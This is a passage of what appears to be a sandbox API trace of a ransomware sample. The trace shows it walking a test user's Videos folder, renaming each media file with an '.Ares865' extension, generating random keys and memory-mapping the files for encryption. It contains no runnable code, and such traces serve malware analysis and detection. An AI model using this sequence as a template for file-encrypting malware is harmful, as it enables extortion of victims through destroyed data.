dwMaximumSizeLow=0x16e30, lpName=0x0) returned 0x15c [0091.779] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16e30) returned 0x190000 [0091.782] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.782] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.782] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\Lsvi1lMhoE5SRGd.flv.Ares865") returned 79 [0091.785] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\Lsvi1lMhoE5SRGd.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\lsvi1lmhoe5srgd.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\Lsvi1lMhoE5SRGd.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\lsvi1lmhoe5srgd.flv.ares865"), dwFlags=0x1) returned 1 [0091.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\Lsvi1lMhoE5SRGd.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\lsvi1lmhoe5srgd.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.788] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71395) returned 1 [0091.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.788] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.789] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.789] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.789] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x119f0, lpName=0x0) returned 0x15c [0091.789] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x119f0) returned 0x190000 [0091.791] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.792] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.792] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.795] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\O5uyA3SYqHNHDz9N2.mp4.Ares865") returned 81 [0091.795] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\O5uyA3SYqHNHDz9N2.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\o5uya3syqhnhdz9n2.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\O5uyA3SYqHNHDz9N2.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\o5uya3syqhnhdz9n2.mp4.ares865"), dwFlags=0x1) returned 1 [0091.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\O5uyA3SYqHNHDz9N2.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\o5uya3syqhnhdz9n2.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.797] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=91544) returned 1 [0091.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.797] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.798] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.798] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.798] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x168a0, lpName=0x0) returned 0x15c [0091.798] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x168a0) returned 0x190000 [0091.801] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.802] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.802] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.802] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.805] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3" [0091.805] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\c9gh2C4WHptCgA_N.flv.Ares865") returned 91 [0091.805] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\c9gh2C4WHptCgA_N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\c9gh2c4whptcga_n.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\c9gh2C4WHptCgA_N.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\c9gh2c4whptcga_n.flv.ares865"), dwFlags=0x1) returned 1 [0091.806] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\c9gh2C4WHptCgA_N.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\c9gh2c4whptcga_n.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.806] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=38542) returned 1 [0091.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0091.806] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0091.807] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.807] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.807] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9990, lpName=0x0) returned 0x15c [0091.808] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9990) returned 0x190000 [0091.809] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0091.809] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.809] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.809] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.811] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\iH29k.swf.Ares865") returned 80 [0091.811] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\iH29k.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\ih29k.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\iH29k.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\ih29k.swf.ares865"), dwFlags=0x1) returned 1 [0091.812] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\iH29k.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\ih29k.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.812] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46295) returned 1 [0091.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0091.812] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0091.813] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.813] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.813] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb7e0, lpName=0x0) returned 0x15c [0091.813] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb7e0) returned 0x190000 [0091.815] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0091.815] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.815] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.818] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\R9AY1YuMv0RZDb2.avi.Ares865") returned 90 [0091.818] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\R9AY1YuMv0RZDb2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\r9ay1yumv0rzdb2.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\R9AY1YuMv0RZDb2.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\r9ay1yumv0rzdb2.avi.ares865"), dwFlags=0x1) returned 1 [0091.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\UziFSNO1C3\\R9AY1YuMv0RZDb2.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uzifsno1c3\\r9ay1yumv0rzdb2.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.819] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26735) returned 1 [0091.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0091.819] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0091.819] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.820] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.820] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b70, lpName=0x0) returned 0x15c [0091.820] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b70) returned 0x190000 [0091.821] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0091.821] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.821] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.821] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.823] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5" [0091.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5\\kxEsWhdONxLwt2.flv.Ares865") returned 98 [0091.823] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5\\kxEsWhdONxLwt2.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uflkr3mnkupk4xritg5\\kxeswhdonxlwt2.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5\\kxEsWhdONxLwt2.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uflkr3mnkupk4xritg5\\kxeswhdonxlwt2.flv.ares865"), dwFlags=0x1) returned 1 [0091.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5\\kxEsWhdONxLwt2.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uflkr3mnkupk4xritg5\\kxeswhdonxlwt2.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.824] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16020) returned 1 [0091.824] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.824] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.824] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0091.825] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0091.825] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.825] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.825] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x41a0, lpName=0x0) returned 0x15c [0091.826] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41a0) returned 0x190000 [0091.827] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0091.827] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.827] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.829] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5\\ZrETzFXv.mp4.Ares865") returned 92 [0091.829] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5\\ZrETzFXv.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uflkr3mnkupk4xritg5\\zretzfxv.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5\\ZrETzFXv.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uflkr3mnkupk4xritg5\\zretzfxv.mp4.ares865"), dwFlags=0x1) returned 1 [0091.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5\\ZrETzFXv.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\uflkr3mnkupk4xritg5\\zretzfxv.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.830] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=69849) returned 1 [0091.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0091.830] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0091.831] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.831] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.831] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x113e0, lpName=0x0) returned 0x15c [0091.831] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x113e0) returned 0x190000 [0091.833] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0091.834] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.834] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0091.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.836] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud" [0091.836] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\e05bJ_sEsi1KyR49lWdn.flv.Ares865") returned 95 [0091.836] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\e05bJ_sEsi1KyR49lWdn.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\e05bj_sesi1kyr49lwdn.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\e05bJ_sEsi1KyR49lWdn.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\e05bj_sesi1kyr49lwdn.flv.ares865"), dwFlags=0x1) returned 1 [0091.837] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\e05bJ_sEsi1KyR49lWdn.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\e05bj_sesi1kyr49lwdn.flv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.837] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21917) returned 1 [0091.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.838] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.838] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.838] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.838] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.838] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x58a0, lpName=0x0) returned 0x15c [0091.839] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x58a0) returned 0x190000 [0091.839] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.842] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\prnBaMQPrqP1JzZ mg2.avi.Ares865") returned 94 [0091.842] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\prnBaMQPrqP1JzZ mg2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\prnbamqprqp1jzz 